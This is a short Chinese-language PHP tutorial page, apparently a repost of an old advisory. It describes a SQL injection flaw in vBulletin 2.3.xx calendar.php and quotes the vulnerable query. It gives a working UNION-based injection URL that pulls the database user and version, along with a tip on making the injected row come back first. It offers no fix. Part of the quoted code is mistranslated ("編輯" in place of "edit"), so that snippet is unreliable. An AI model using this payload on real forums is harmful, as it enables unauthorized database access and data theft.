首頁 >後端開發 >php教程 >vBulletin Forum 2.3.xx SQL Injection_PHP教程

vBulletin Forum 2.3.xx SQL Injection_PHP教程

WBOY
WBOY原創
2016-07-21 16:09:261023瀏覽


vBulletin 論壇 2.3.xx SQL 注入 calendar.php 有sql注入問題。

-------- 截自calendar.php第585行----------
else if ($ action == "編輯")
{
      $eventinfo = $DB_site->query_first("SELECT allowedmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid")
如果MySQL版本大於4.00,則可以使用UNION攻擊。

---------------- -------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12 union (SELECT allowedmilies,public,userid,'0000-0-0',user(),version() FROM calendar_ev
ents WHERE eventid = 13) order by eventdate
---------- ---------------------------- ---

query_first函數只會傳回查詢結果的第一行,所以請確保它回傳!
你想要的那個。

http://www.bkjia.com/PHPjc/314536.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/314536.htmlTechArticlevBulletin論壇2.3.xx SQL注入calendar.php中有sql注入問題。 -------- 從calendar.php 的第585 行剪切---------- else if ($action == "edit") { $eventi...
陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn